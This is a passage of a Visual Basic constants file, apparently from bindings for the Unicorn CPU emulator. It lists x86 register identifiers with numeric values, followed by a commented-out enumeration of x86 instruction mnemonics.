UC_X86_REG_DR1 = 67 + UC_X86_REG_DR2 = 68 + UC_X86_REG_DR3 = 69 + UC_X86_REG_DR4 = 70 + UC_X86_REG_DR5 = 71 + UC_X86_REG_DR6 = 72 + UC_X86_REG_DR7 = 73 + UC_X86_REG_DR8 = 74 + UC_X86_REG_DR9 = 75 + UC_X86_REG_DR10 = 76 + UC_X86_REG_DR11 = 77 + UC_X86_REG_DR12 = 78 + UC_X86_REG_DR13 = 79 + UC_X86_REG_DR14 = 80 + UC_X86_REG_DR15 = 81 + UC_X86_REG_FP0 = 82 + UC_X86_REG_FP1 = 83 + UC_X86_REG_FP2 = 84 + UC_X86_REG_FP3 = 85 + UC_X86_REG_FP4 = 86 + UC_X86_REG_FP5 = 87 + UC_X86_REG_FP6 = 88 + UC_X86_REG_FP7 = 89 + UC_X86_REG_K0 = 90 + UC_X86_REG_K1 = 91 + UC_X86_REG_K2 = 92 + UC_X86_REG_K3 = 93 + UC_X86_REG_K4 = 94 + UC_X86_REG_K5 = 95 + UC_X86_REG_K6 = 96 + UC_X86_REG_K7 = 97 + UC_X86_REG_MM0 = 98 + UC_X86_REG_MM1 = 99 + UC_X86_REG_MM2 = 100 + UC_X86_REG_MM3 = 101 + UC_X86_REG_MM4 = 102 + UC_X86_REG_MM5 = 103 + UC_X86_REG_MM6 = 104 + UC_X86_REG_MM7 = 105 + UC_X86_REG_R8 = 106 + UC_X86_REG_R9 = 107 + UC_X86_REG_R10 = 108 + UC_X86_REG_R11 = 109 + UC_X86_REG_R12 = 110 + UC_X86_REG_R13 = 111 + UC_X86_REG_R14 = 112 + UC_X86_REG_R15 = 113 + UC_X86_REG_ST0 = 114 + UC_X86_REG_ST1 = 115 + UC_X86_REG_ST2 = 116 + UC_X86_REG_ST3 = 117 + UC_X86_REG_ST4 = 118 + UC_X86_REG_ST5 = 119 + UC_X86_REG_ST6 = 120 + UC_X86_REG_ST7 = 121 + UC_X86_REG_XMM0 = 122 + UC_X86_REG_XMM1 = 123 + UC_X86_REG_XMM2 = 124 + UC_X86_REG_XMM3 = 125 + UC_X86_REG_XMM4 = 126 + UC_X86_REG_XMM5 = 127 + UC_X86_REG_XMM6 = 128 + UC_X86_REG_XMM7 = 129 + UC_X86_REG_XMM8 = 130 + UC_X86_REG_XMM9 = 131 + UC_X86_REG_XMM10 = 132 + UC_X86_REG_XMM11 = 133 + UC_X86_REG_XMM12 = 134 + UC_X86_REG_XMM13 = 135 + UC_X86_REG_XMM14 = 136 + UC_X86_REG_XMM15 = 137 + UC_X86_REG_XMM16 = 138 + UC_X86_REG_XMM17 = 139 + UC_X86_REG_XMM18 = 140 + UC_X86_REG_XMM19 = 141 + UC_X86_REG_XMM20 = 142 + UC_X86_REG_XMM21 = 143 + UC_X86_REG_XMM22 = 144 + UC_X86_REG_XMM23 = 145 + UC_X86_REG_XMM24 = 146 + UC_X86_REG_XMM25 = 147 + UC_X86_REG_XMM26 = 148 + UC_X86_REG_XMM27 = 149 + UC_X86_REG_XMM28 = 150 + UC_X86_REG_XMM29 = 151 + UC_X86_REG_XMM30 = 152 + UC_X86_REG_XMM31 = 153 + UC_X86_REG_YMM0 = 154 + UC_X86_REG_YMM1 = 155 + UC_X86_REG_YMM2 = 156 + UC_X86_REG_YMM3 = 157 + UC_X86_REG_YMM4 = 158 + UC_X86_REG_YMM5 = 159 + UC_X86_REG_YMM6 = 160 + UC_X86_REG_YMM7 = 161 + UC_X86_REG_YMM8 = 162 + UC_X86_REG_YMM9 = 163 + UC_X86_REG_YMM10 = 164 + UC_X86_REG_YMM11 = 165 + UC_X86_REG_YMM12 = 166 + UC_X86_REG_YMM13 = 167 + UC_X86_REG_YMM14 = 168 + UC_X86_REG_YMM15 = 169 + UC_X86_REG_YMM16 = 170 + UC_X86_REG_YMM17 = 171 + UC_X86_REG_YMM18 = 172 + UC_X86_REG_YMM19 = 173 + UC_X86_REG_YMM20 = 174 + UC_X86_REG_YMM21 = 175 + UC_X86_REG_YMM22 = 176 + UC_X86_REG_YMM23 = 177 + UC_X86_REG_YMM24 = 178 + UC_X86_REG_YMM25 = 179 + UC_X86_REG_YMM26 = 180 + UC_X86_REG_YMM27 = 181 + UC_X86_REG_YMM28 = 182 + UC_X86_REG_YMM29 = 183 + UC_X86_REG_YMM30 = 184 + UC_X86_REG_YMM31 = 185 + UC_X86_REG_ZMM0 = 186 + UC_X86_REG_ZMM1 = 187 + UC_X86_REG_ZMM2 = 188 + UC_X86_REG_ZMM3 = 189 + UC_X86_REG_ZMM4 = 190 + UC_X86_REG_ZMM5 = 191 + UC_X86_REG_ZMM6 = 192 + UC_X86_REG_ZMM7 = 193 + UC_X86_REG_ZMM8 = 194 + UC_X86_REG_ZMM9 = 195 + UC_X86_REG_ZMM10 = 196 + UC_X86_REG_ZMM11 = 197 + UC_X86_REG_ZMM12 = 198 + UC_X86_REG_ZMM13 = 199 + UC_X86_REG_ZMM14 = 200 + UC_X86_REG_ZMM15 = 201 + UC_X86_REG_ZMM16 = 202 + UC_X86_REG_ZMM17 = 203 + UC_X86_REG_ZMM18 = 204 + UC_X86_REG_ZMM19 = 205 + UC_X86_REG_ZMM20 = 206 + UC_X86_REG_ZMM21 = 207 + UC_X86_REG_ZMM22 = 208 + UC_X86_REG_ZMM23 = 209 + UC_X86_REG_ZMM24 = 210 + UC_X86_REG_ZMM25 = 211 + UC_X86_REG_ZMM26 = 212 + UC_X86_REG_ZMM27 = 213 + UC_X86_REG_ZMM28 = 214 + UC_X86_REG_ZMM29 = 215 + UC_X86_REG_ZMM30 = 216 + UC_X86_REG_ZMM31 = 217 + UC_X86_REG_R8B = 218 + UC_X86_REG_R9B = 219 + UC_X86_REG_R10B = 220 + UC_X86_REG_R11B = 221 + UC_X86_REG_R12B = 222 + UC_X86_REG_R13B = 223 + UC_X86_REG_R14B = 224 + UC_X86_REG_R15B = 225 + UC_X86_REG_R8D = 226 + UC_X86_REG_R9D = 227 + UC_X86_REG_R10D = 228 + UC_X86_REG_R11D = 229 + UC_X86_REG_R12D = 230 + UC_X86_REG_R13D = 231 + UC_X86_REG_R14D = 232 + UC_X86_REG_R15D = 233 + UC_X86_REG_R8W = 234 + UC_X86_REG_R9W = 235 + UC_X86_REG_R10W = 236 + UC_X86_REG_R11W = 237 + UC_X86_REG_R12W = 238 + UC_X86_REG_R13W = 239 + UC_X86_REG_R14W = 240 + UC_X86_REG_R15W = 241 + UC_X86_REG_IDTR = 242 + UC_X86_REG_GDTR = 243 + UC_X86_REG_LDTR = 244 + UC_X86_REG_TR = 245 + UC_X86_REG_FPCW = 246 + UC_X86_REG_FPTAG = 247 + UC_X86_REG_ENDING = 248 +End Enum + +'Public Enum uc_x86_insn +' UC_X86_INS_INVALID = 0 +' UC_X86_INS_AAA = 1 +' UC_X86_INS_AAD = 2 +' UC_X86_INS_AAM = 3 +' UC_X86_INS_AAS = 4 +' UC_X86_INS_FABS = 5 +' UC_X86_INS_ADC = 6 +' UC_X86_INS_ADCX = 7 +' UC_X86_INS_ADD = 8 +' UC_X86_INS_ADDPD = 9 +' UC_X86_INS_ADDPS = 10 +' UC_X86_INS_ADDSD = 11 +' UC_X86_INS_ADDSS = 12 +' UC_X86_INS_ADDSUBPD = 13 +' UC_X86_INS_ADDSUBPS = 14 +' UC_X86_INS_FADD = 15 +' UC_X86_INS_FIADD = 16 +' UC_X86_INS_FADDP = 17 +' UC_X86_INS_ADOX = 18 +' UC_X86_INS_AESDECLAST = 19 +' UC_X86_INS_AESDEC = 20 +' UC_X86_INS_AESENCLAST = 21 +' UC_X86_INS_AESENC = 22 +' UC_X86_INS_AESIMC = 23 +' UC_X86_INS_AESKEYGENASSIST = 24 +' UC_X86_INS_AND = 25 +' UC_X86_INS_ANDN = 26 +' UC_X86_INS_ANDNPD = 27 +' UC_X86_INS_ANDNPS = 28 +' UC_X86_INS_ANDPD = 29 +' UC_X86_INS_ANDPS = 30 +' UC_X86_INS_ARPL = 31 +' UC_X86_INS_BEXTR = 32 +' UC_X86_INS_BLCFILL = 33 +' UC_X86_INS_BLCI = 34 +' UC_X86_INS_BLCIC = 35 +' UC_X86_INS_BLCMSK = 36 +' UC_X86_INS_BLCS = 37 +' UC_X86_INS_BLENDPD = 38 +' UC_X86_INS_BLENDPS = 39 +' UC_X86_INS_BLENDVPD = 40 +' UC_X86_INS_BLENDVPS = 41 +' UC_X86_INS_BLSFILL = 42 +' UC_X86_INS_BLSI = 43 +' UC_X86_INS_BLSIC = 44 +' UC_X86_INS_BLSMSK = 45 +' UC_X86_INS_BLSR = 46 +' UC_X86_INS_BOUND = 47 +' UC_X86_INS_BSF = 48 +' UC_X86_INS_BSR = 49 +' UC_X86_INS_BSWAP = 50 +' UC_X86_INS_BT = 51 +' UC_X86_INS_BTC = 52 +' UC_X86_INS_BTR = 53 +' UC_X86_INS_BTS = 54 +' UC_X86_INS_BZHI = 55 +' UC_X86_INS_CALL = 56 +' UC_X86_INS_CBW = 57 +' UC_X86_INS_CDQ = 58 +' UC_X86_INS_CDQE = 59 +' UC_X86_INS_FCHS = 60 +' UC_X86_INS_CLAC = 61 +' UC_X86_INS_CLC = 62 +' UC_X86_INS_CLD = 63 +' UC_X86_INS_CLFLUSH = 64 +' UC_X86_INS_CLFLUSHOPT = 65 +' UC_X86_INS_CLGI = 66 +' UC_X86_INS_CLI = 67 +' UC_X86_INS_CLTS = 68 +' UC_X86_INS_CLWB = 69 +' UC_X86_INS_CMC = 70 +' UC_X86_INS_CMOVA = 71 +' UC_X86_INS_CMOVAE = 72 +' UC_X86_INS_CMOVB = 73 +' UC_X86_INS_CMOVBE = 74 +' UC_X86_INS_FCMOVBE = 75 +' UC_X86_INS_FCMOVB = 76 +' UC_X86_INS_CMOVE = 77 +' UC_X86_INS_FCMOVE = 78 +' UC_X86_INS_CMOVG = 79 +' UC_X86_INS_CMOVGE = 80 +' UC_X86_INS_CMOVL = 81 +' UC_X86_INS_CMOVLE = 82 +' UC_X86_INS_FCMOVNBE = 83 +' UC_X86_INS_FCMOVNB = 84 +' UC_X86_INS_CMOVNE = 85 +' UC_X86_INS_FCMOVNE = 86 +' UC_X86_INS_CMOVNO = 87 +' UC_X86_INS_CMOVNP = 88 +' UC_X86_INS_FCMOVNU = 89 +' UC_X86_INS_CMOVNS = 90 +' UC_X86_INS_CMOVO = 91 +' UC_X86_INS_CMOVP = 92 +' UC_X86_INS_FCMOVU = 93 +' UC_X86_INS_CMOVS = 94 +' UC_X86_INS_CMP = 95 +' UC_X86_INS_CMPPD = 96 +' UC_X86_INS_CMPPS = 97 +' UC_X86_INS_CMPSB = 98 +' UC_X86_INS_CMPSD = 99 +' UC_X86_INS_CMPSQ = 100 +' UC_X86_INS_CMPSS = 101 +' UC_X86_INS_CMPSW = 102 +' UC_X86_INS_CMPXCHG16B = 103 +' UC_X86_INS_CMPXCHG = 104 +' UC_X86_INS_CMPXCHG8B = 105 +' UC_X86_INS_COMISD = 106 +' UC_X86_INS_COMISS = 107 +' UC_X86_INS_FCOMP = 108 +' UC_X86_INS_FCOMPI = 109 +' UC_X86_INS_FCOMI = 110 +' UC_X86_INS_FCOM = 111 +' UC_X86_INS_FCOS = 112 +' UC_X86_INS_CPUID = 113 +' UC_X86_INS_CQO = 114 +' UC_X86_INS_CRC32 = 115 +' UC_X86_INS_CVTDQ2PD = 116 +' UC_X86_INS_CVTDQ2PS = 117 +' UC_X86_INS_CVTPD2DQ = 118 +' UC_X86_INS_CVTPD2PS = 119 +' UC_X86_INS_CVTPS2DQ = 120 +' UC_X86_INS_CVTPS2PD = 121 +' UC_X86_INS_CVTSD2SI = 122 +' UC_X86_INS_CVTSD2SS = 123 +' UC_X86_INS_CVTSI2SD = 124 +' UC_X86_INS_CVTSI2SS = 125 +' UC_X86_INS_CVTSS2SD = 126 +' UC_X86_INS_CVTSS2SI = 127 +' UC_X86_INS_CVTTPD2DQ = 128 +' UC_X86_INS_CVTTPS2DQ = 129 +' UC_X86_INS_CVTTSD2SI = 130 +' UC_X86_INS_CVTTSS2SI = 131 +' UC_X86_INS_CWD = 132 +' UC_X86_INS_CWDE = 133 +' UC_X86_INS_DAA = 134 +' UC_X86_INS_DAS = 135 +' UC_X86_INS_DATA16 = 136 +' UC_X86_INS_DEC = 137 +' UC_X86_INS_DIV = 138 +' UC_X86_INS_DIVPD = 139 +' UC_X86_INS_DIVPS = 140 +' UC_X86_INS_FDIVR = 141 +' UC_X86_INS_FIDIVR = 142 +' UC_X86_INS_FDIVRP = 143 +' UC_X86_INS_DIVSD = 144 +' UC_X86_INS_DIVSS = 145 +' UC_X86_INS_FDIV = 146 +' UC_X86_INS_FIDIV = 147 +' UC_X86_INS_FDIVP = 148 +' UC_X86_INS_DPPD = 149 +' UC_X86_INS_DPPS = 150 +' UC_X86_INS_RET = 151 +' UC_X86_INS_ENCLS = 152 +' UC_X86_INS_ENCLU = 153 +' UC_X86_INS_ENTER = 154 +' UC_X86_INS_EXTRACTPS = 155 +' UC_X86_INS_EXTRQ = 156 +' UC_X86_INS_F2XM1 = 157 +' UC_X86_INS_LCALL = 158 +' UC_X86_INS_LJMP = 159 +' UC_X86_INS_FBLD = 160 +' UC_X86_INS_FBSTP = 161 +' UC_X86_INS_FCOMPP = 162 +' UC_X86_INS_FDECSTP = 163 +' UC_X86_INS_FEMMS = 164 +' UC_X86_INS_FFREE = 165 +' UC_X86_INS_FICOM = 166 +' UC_X86_INS_FICOMP = 167 +' UC_X86_INS_FINCSTP = 168 +' UC_X86_INS_FLDCW = 169 +' UC_X86_INS_FLDENV = 170 +' UC_X86_INS_FLDL2E = 171 +' UC_X86_INS_FLDL2T = 172 +' UC_X86_INS_FLDLG2 = 173 +' UC_X86_INS_FLDLN2 = 174 +' UC_X86_INS_FLDPI = 175 +' UC_X86_INS_FNCLEX = 176 +' UC_X86_INS_FNINIT = 177 +' UC_X86_INS_FNOP = 178 +' UC_X86_INS_FNSTCW = 179 +' UC_X86_INS_FNSTSW = 180 +' UC_X86_INS_FPATAN = 181 +' UC_X86_INS_FPREM = 182 +' UC_X86_INS_FPREM1 = 183 +' UC_X86_INS_FPTAN = 184 +' UC_X86_INS_FFREEP = 185 +' UC_X86_INS_FRNDINT = 186 +' UC_X86_INS_FRSTOR = 187 +' UC_X86_INS_FNSAVE = 188 +' UC_X86_INS_FSCALE = 189 +' UC_X86_INS_FSETPM = 190 +' UC_X86_INS_FSINCOS = 191 +' UC_X86_INS_FNSTENV = 192 +' UC_X86_INS_FXAM = 193 +' UC_X86_INS_FXRSTOR = 194 +' UC_X86_INS_FXRSTOR64 = 195 +' UC_X86_INS_FXSAVE = 196 +' UC_X86_INS_FXSAVE64 = 197 +' UC_X86_INS_FXTRACT = 198 +' UC_X86_INS_FYL2X = 199 +' UC_X86_INS_FYL2XP1 = 200 +' UC_X86_INS_MOVAPD = 201 +' UC_X86_INS_MOVAPS = 202 +' UC_X86_INS_ORPD = 203 +' UC_X86_INS_ORPS = 204 +' UC_X86_INS_VMOVAPD = 205 +' UC_X86_INS_VMOVAPS = 206 +' UC_X86_INS_XORPD = 207 +' UC_X86_INS_XORPS = 208 +' UC_X86_INS_GETSEC = 209 +' UC_X86_INS_HADDPD = 210 +' UC_X86_INS_HADDPS = 211 +' UC_X86_INS_HLT = 212 +' UC_X86_INS_HSUBPD = 213 +' UC_X86_INS_HSUBPS = 214 +' UC_X86_INS_IDIV = 215 +' UC_X86_INS_FILD = 216 +' UC_X86_INS_IMUL = 217 +' UC_X86_INS_IN = 218 +' UC_X86_INS_INC = 219 +' UC_X86_INS_INSB = 220 +' UC_X86_INS_INSERTPS = 221 +' UC_X86_INS_INSERTQ = 222 +' UC_X86_INS_INSD = 223 +' UC_X86_INS_INSW = 224 +' UC_X86_INS_INT = 225 +' UC_X86_INS_INT1 = 226 +' UC_X86_INS_INT3 = 227 +' UC_X86_INS_INTO = 228 +' UC_X86_INS_INVD = 229 +' UC_X86_INS_INVEPT = 230 +' UC_X86_INS_INVLPG = 231 +' UC_X86_INS_INVLPGA = 232 +' UC_X86_INS_INVPCID = 233 +' UC_X86_INS_INVVPID = 234 +' UC_X86_INS_IRET = 235 +' UC_X86_INS_IRETD = 236 +' UC_X86_INS_IRETQ = 237 +' UC_X86_INS_FISTTP = 238 +' UC_X86_INS_FIST = 239 +' UC_X86_INS_FISTP = 240 +' UC_X86_INS_UCOMISD = 241 +' UC_X86_INS_UCOMISS = 242 +' UC_X86_INS_VCOMISD = 243 +' UC_X86_INS_VCOMISS = 244 +' UC_X86_INS_VCVTSD2SS = 245 +' UC_X86_INS_VCVTSI2SD = 246 +' UC_X86_INS_VCVTSI2SS = 247 +' UC_X86_INS_VCVTSS2SD = 248 +' UC_X86_INS_VCVTTSD2SI = 249 +' UC_X86_INS_VCVTTSD2USI = 250 +' UC_X86_INS_VCVTTSS2SI = 251 +' UC_X86_INS_VCVTTSS2USI = 252 +' UC_X86_INS_VCVTUSI2SD = 253 +' UC_X86_INS_VCVTUSI2SS = 254 +' UC_X86_INS_VUCOMISD = 255 +' UC_X86_INS_VUCOMISS = 256 +' UC_X86_INS_JAE = 257 +' UC_X86_INS_JA = 258 +' UC_X86_INS_JBE = 259 +' UC_X86_INS_JB = 260 +' UC_X86_INS_JCXZ = 261 +' UC_X86_INS_JECXZ = 262 +' UC_X86_INS_JE = 263 +' UC_X86_INS_JGE = 264 +' UC_X86_INS_JG = 265 +' UC_X86_INS_JLE = 266 +' UC_X86_INS_JL = 267 +' UC_X86_INS_JMP = 268 +' UC_X86_INS_JNE = 269 +' UC_X86_INS_JNO = 270 +' UC_X86_INS_JNP = 271 +' UC_X86_INS_JNS = 272 +' UC_X86_INS_JO = 273 +' UC_X86_INS_JP = 274 +' UC_X86_INS_JRCXZ = 275 +' UC_X86_INS_JS = 276 +' UC_X86_INS_KANDB = 277 +' UC_X86_INS_KANDD = 278 +' UC_X86_INS_KANDNB = 279 +' UC_X86_INS_KANDND = 280 +' UC_X86_INS_KANDNQ = 281 +' UC_X86_INS_KANDNW = 282 +' UC_X86_INS_KANDQ = 283 +' UC_X86_INS_KANDW = 284 +' UC_X86_INS_KMOVB = 285 +' UC_X86_INS_KMOVD = 286 +' UC_X86_INS_KMOVQ = 287 +' UC_X86_INS_KMOVW = 288 +' UC_X86_INS_KNOTB = 289 +' UC_X86_INS_KNOTD = 290 +' UC_X86_INS_KNOTQ = 291 +' UC_X86_INS_KNOTW = 292 +' UC_X86_INS_KORB = 293 +' UC_X86_INS_KORD = 294 +' UC_X86_INS_KORQ = 295 +' UC_X86_INS_KORTESTB = 296 +' UC_X86_INS_KORTESTD = 297 +' UC_X86_INS_KORTESTQ = 298 +' UC_X86_INS_KORTESTW = 299 +' UC_X86_INS_KORW = 300 +' UC_X86_INS_KSHIFTLB = 301 +' UC_X86_INS_KSHIFTLD = 302 +' UC_X86_INS_KSHIFTLQ = 303 +' UC_X86_INS_KSHIFTLW = 304 +' UC_X86_INS_KSHIFTRB = 305 +' UC_X86_INS_KSHIFTRD = 306 +' UC_X86_INS_KSHIFTRQ = 307 +' UC_X86_INS_KSHIFTRW = 308 +' UC_X86_INS_KUNPCKBW = 309 +' UC_X86_INS_KXNORB = 310 +' UC_X86_INS_KXNORD = 311 +' UC_X86_INS_KXNORQ = 312 +' UC_X86_INS_KXNORW = 313 +' UC_X86_INS_KXORB = 314 +' UC_X86_INS_KXORD = 315 +' UC_X86_INS_KXORQ = 316 +' UC_X86_INS_KXORW = 317 +' UC_X86_INS_LAHF = 318 +' UC_X86_INS_LAR = 319 +' UC_X86_INS_LDDQU = 320 +' UC_X86_INS_LDMXCSR = 321 +' UC_X86_INS_LDS = 322 +' UC_X86_INS_FLDZ = 323 +' UC_X86_INS_FLD1 = 324 +' UC_X86_INS_FLD = 325 +' UC_X86_INS_LEA = 326 +' UC_X86_INS_LEAVE = 327 +' UC_X86_INS_LES = 328 +' UC_X86_INS_LFENCE = 329 +' UC_X86_INS_LFS = 330 +' UC_X86_INS_LGDT = 331 +' UC_X86_INS_LGS = 332 +' UC_X86_INS_LIDT = 333 +' UC_X86_INS_LLDT = 334 +' UC_X86_INS_LMSW = 335 +' UC_X86_INS_OR = 336 +' UC_X86_INS_SUB = 337 +' UC_X86_INS_XOR = 338 +' UC_X86_INS_LODSB = 339 +' UC_X86_INS_LODSD = 340 +' UC_X86_INS_LODSQ = 341 +' UC_X86_INS_LODSW = 342 +' UC_X86_INS_LOOP = 343 +' UC_X86_INS_LOOPE = 344 +' UC_X86_INS_LOOPNE = 345 +' UC_X86_INS_RETF = 346 +' UC_X86_INS_RETFQ = 347 +' UC_X86_INS_LSL = 348 +' UC_X86_INS_LSS = 349 +' UC_X86_INS_LTR = 350 +' UC_X86_INS_XADD = 351 +' UC_X86_INS_LZCNT = 352 +' UC_X86_INS_MASKMOVDQU = 353 +' UC_X86_INS_MAXPD = 354 +' UC_X86_INS_MAXPS = 355 +' UC_X86_INS_MAXSD = 356 +' UC_X86_INS_MAXSS = 357 +' UC_X86_INS_MFENCE = 358 +' UC_X86_INS_MINPD = 359 +' UC_X86_INS_MINPS = 360 +' UC_X86_INS_MINSD = 361 +' UC_X86_INS_MINSS = 362 +' UC_X86_INS_CVTPD2PI = 363 +' UC_X86_INS_CVTPI2PD = 364 +' UC_X86_INS_CVTPI2PS = 365 +' UC_X86_INS_CVTPS2PI = 366 +' UC_X86_INS_CVTTPD2PI = 367 +' UC_X86_INS_CVTTPS2PI = 368 +' UC_X86_INS_EMMS = 369 +' UC_X86_INS_MASKMOVQ = 370 +' UC_X86_INS_MOVD = 371 +' UC_X86_INS_MOVDQ2Q = 372 +' UC_X86_INS_MOVNTQ = 373 +' UC_X86_INS_MOVQ2DQ = 374 +' UC_X86_INS_MOVQ = 375 +' UC_X86_INS_PABSB = 376 +' UC_X86_INS_PABSD = 377 +' UC_X86_INS_PABSW = 378 +' UC_X86_INS_PACKSSDW = 379 +' UC_X86_INS_PACKSSWB = 380 +' UC_X86_INS_PACKUSWB = 381 +' UC_X86_INS_PADDB = 382 +' UC_X86_INS_PADDD = 383 +' UC_X86_INS_PADDQ = 384 +' UC_X86_INS_PADDSB = 385 +' UC_X86_INS_PADDSW = 386 +' UC_X86_INS_PADDUSB = 387 +' UC_X86_INS_PADDUSW = 388 +' UC_X86_INS_PADDW = 389 +' UC_X86_INS_PALIGNR = 390 +' UC_X86_INS_PANDN = 391 +' UC_X86_INS_PAND = 392 +' UC_X86_INS_PAVGB = 393 +' UC_X86_INS_PAVGW = 394 +' UC_X86_INS_PCMPEQB = 395 +' UC_X86_INS_PCMPEQD = 396 +' UC_X86_INS_PCMPEQW = 397 +' UC_X86_INS_PCMPGTB = 398 +' UC_X86_INS_PCMPGTD = 399 +' UC_X86_INS_PCMPGTW = 400 +' UC_X86_INS_PEXTRW = 401 +' UC_X86_INS_PHADDSW = 402 +' UC_X86_INS_PHADDW = 403 +' UC_X86_INS_PHADDD = 404 +' UC_X86_INS_PHSUBD = 405 +' UC_X86_INS_PHSUBSW = 406 +' UC_X86_INS_PHSUBW = 407 +' UC_X86_INS_PINSRW = 408 +' UC_X86_INS_PMADDUBSW = 409 +' UC_X86_INS_PMADDWD = 410 +' UC_X86_INS_PMAXSW = 411 +' UC_X86_INS_PMAXUB = 412 +' UC_X86_INS_PMINSW = 413 +' UC_X86_INS_PMINUB = 414 +' UC_X86_INS_PMOVMSKB = 415 +' UC_X86_INS_PMULHRSW = 416 +' UC_X86_INS_PMULHUW = 417 +' UC_X86_INS_PMULHW = 418 +' UC_X86_INS_PMULLW = 419 +' UC_X86_INS_PMULUDQ = 420 +' UC_X86_INS_POR = 421 +' UC_X86_INS_PSADBW = 422 +' UC_X86_INS_PSHUFB = 423 +' UC_X86_INS_PSHUFW = 424 +' UC_X86_INS_PSIGNB = 425 +' UC_X86_INS_PSIGND = 426 +' UC_X86_INS_PSIGNW = 427 +' UC_X86_INS_PSLLD = 428 +' UC_X86_INS_PSLLQ = 429 +' UC_X86_INS_PSLLW = 430 +' UC_X86_INS_PSRAD = 431 +' UC_X86_INS_PSRAW = 432 +' UC_X86_INS_PSRLD = 433 +' UC_X86_INS_PSRLQ = 434 +' UC_X86_INS_PSRLW = 435 +' UC_X86_INS_PSUBB = 436 +' UC_X86_INS_PSUBD = 437 +' UC_X86_INS_PSUBQ = 438 +' UC_X86_INS_PSUBSB = 439 +' UC_X86_INS_PSUBSW = 440 +' UC_X86_INS_PSUBUSB = 441 +' UC_X86_INS_PSUBUSW = 442 +' UC_X86_INS_PSUBW = 443 +' UC_X86_INS_PUNPCKHBW = 444 +' UC_X86_INS_PUNPCKHDQ = 445 +' UC_X86_INS_PUNPCKHWD = 446 +' UC_X86_INS_PUNPCKLBW = 447 +' UC_X86_INS_PUNPCKLDQ = 448 +' UC_X86_INS_PUNPCKLWD = 449 +' UC_X86_INS_PXOR = 450 +' UC_X86_INS_MONITOR = 451 +' UC_X86_INS_MONTMUL = 452 +' UC_X86_INS_MOV = 453 +' UC_X86_INS_MOVABS = 454 +' UC_X86_INS_MOVBE = 455 +' UC_X86_INS_MOVDDUP = 456 +' UC_X86_INS_MOVDQA = 457 +' UC_X86_INS_MOVDQU = 458 +' UC_X86_INS_MOVHLPS = 459 +' UC_X86_INS_MOVHPD = 460 +' UC_X86_INS_MOVHPS = 461 +' UC_X86_INS_MOVLHPS = 462 +' UC_X86_INS_MOVLPD = 463 +' UC_X86_INS_MOVLPS = 464 +' UC_X86_INS_MOVMSKPD = 465 +' UC_X86_INS_MOVMSKPS = 466 +' UC_X86_INS_MOVNTDQA = 467 +' UC_X86_INS_MOVNTDQ = 468 +' UC_X86_INS_MOVNTI = 469 +' UC_X86_INS_MOVNTPD = 470 +' UC_X86_INS_MOVNTPS = 471 +' UC_X86_INS_MOVNTSD = 472 +' UC_X86_INS_MOVNTSS = 473 +' UC_X86_INS_MOVSB = 474 +' UC_X86_INS_MOVSD = 475 +' UC_X86_INS_MOVSHDUP = 476 +' UC_X86_INS_MOVSLDUP = 477 +' UC_X86_INS_MOVSQ = 478 +' UC_X86_INS_MOVSS = 479 +' UC_X86_INS_MOVSW = 480 +' UC_X86_INS_MOVSX = 481 +' UC_X86_INS_MOVSXD = 482 +' UC_X86_INS_MOVUPD = 483 +' UC_X86_INS_MOVUPS = 484 +' UC_X86_INS_MOVZX = 485 +' UC_X86_INS_MPSADBW = 486 +' UC_X86_INS_MUL = 487 +' UC_X86_INS_MULPD = 488 +' UC_X86_INS_MULPS = 489 +' UC_X86_INS_MULSD = 490 +' UC_X86_INS_MULSS = 491 +' UC_X86_INS_MULX = 492 +' UC_X86_INS_FMUL = 493 +' UC_X86_INS_FIMUL = 494 +' UC_X86_INS_FMULP = 495 +' UC_X86_INS_MWAIT = 496 +' UC_X86_INS_NEG = 497 +' UC_X86_INS_NOP = 498 +' UC_X86_INS_NOT = 499 +' UC_X86_INS_OUT = 500 +' UC_X86_INS_OUTSB = 501 +' UC_X86_INS_OUTSD = 502 +' UC_X86_INS_OUTSW = 503 +' UC_X86_INS_PACKUSDW = 504 +' UC_X86_INS_PAUSE = 505 +' UC_X86_INS_PAVGUSB = 506 +' UC_X86_INS_PBLENDVB = 507 +' UC_X86_INS_PBLENDW = 508 +' UC_X86_INS_PCLMULQDQ = 509 +' UC_X86_INS_PCMPEQQ = 510 +' UC_X86_INS_PCMPESTRI = 511 +' UC_X86_INS_PCMPESTRM = 512 +' UC_X86_INS_PCMPGTQ = 513 +' UC_X86_INS_PCMPISTRI = 514 +' UC_X86_INS_PCMPISTRM = 515 +' UC_X86_INS_PCOMMIT = 516 +' UC_X86_INS_PDEP = 517 +' UC_X86_INS_PEXT = 518 +' UC_X86_INS_PEXTRB = 519 +' UC_X86_INS_PEXTRD = 520 +' UC_X86_INS_PEXTRQ = 521 +' UC_X86_INS_PF2ID = 522 +' UC_X86_INS_PF2IW = 523 +' UC_X86_INS_PFACC = 524 +' UC_X86_INS_PFADD = 525 +' UC_X86_INS_PFCMPEQ = 526 +' UC_X86_INS_PFCMPGE = 527 +' UC_X86_INS_PFCMPGT = 528 +' UC_X86_INS_PFMAX = 529 +' UC_X86_INS_PFMIN = 530 +' UC_X86_INS_PFMUL = 531 +' UC_X86_INS_PFNACC = 532 +' UC_X86_INS_PFPNACC = 533 +' UC_X86_INS_PFRCPIT1 = 534 +' UC_X86_INS_PFRCPIT2 = 535 +' UC_X86_INS_PFRCP = 536 +' UC_X86_INS_PFRSQIT1 = 537 +' UC_X86_INS_PFRSQRT = 538 +' UC_X86_INS_PFSUBR = 539 +' UC_X86_INS_PFSUB = 540 +' UC_X86_INS_PHMINPOSUW = 541 +' UC_X86_INS_PI2FD = 542 +' UC_X86_INS_PI2FW = 543 +' UC_X86_INS_PINSRB = 544 +' UC_X86_INS_PINSRD = 545 +' UC_X86_INS_PINSRQ = 546 +' UC_X86_INS_PMAXSB = 547 +' UC_X86_INS_PMAXSD = 548 +' UC_X86_INS_PMAXUD = 549 +' UC_X86_INS_PMAXUW = 550 +' UC_X86_INS_PMINSB = 551 +' UC_X86_INS_PMINSD = 552 +' UC_X86_INS_PMINUD = 553 +' UC_X86_INS_PMINUW = 554 +' UC_X86_INS_PMOVSXBD = 555 +' UC_X86_INS_PMOVSXBQ = 556 +' UC_X86_INS_PMOVSXBW = 557 +' UC_X86_INS_PMOVSXDQ = 558 +' UC_X86_INS_PMOVSXWD = 559 +' UC_X86_INS_PMOVSXWQ = 560 +' UC_X86_INS_PMOVZXBD = 561 +' UC_X86_INS_PMOVZXBQ = 562 +' UC_X86_INS_PMOVZXBW = 563 +' UC_X86_INS_PMOVZXDQ = 564 +' UC_X86_INS_PMOVZXWD = 565 +' UC_X86_INS_PMOVZXWQ = 566 +' 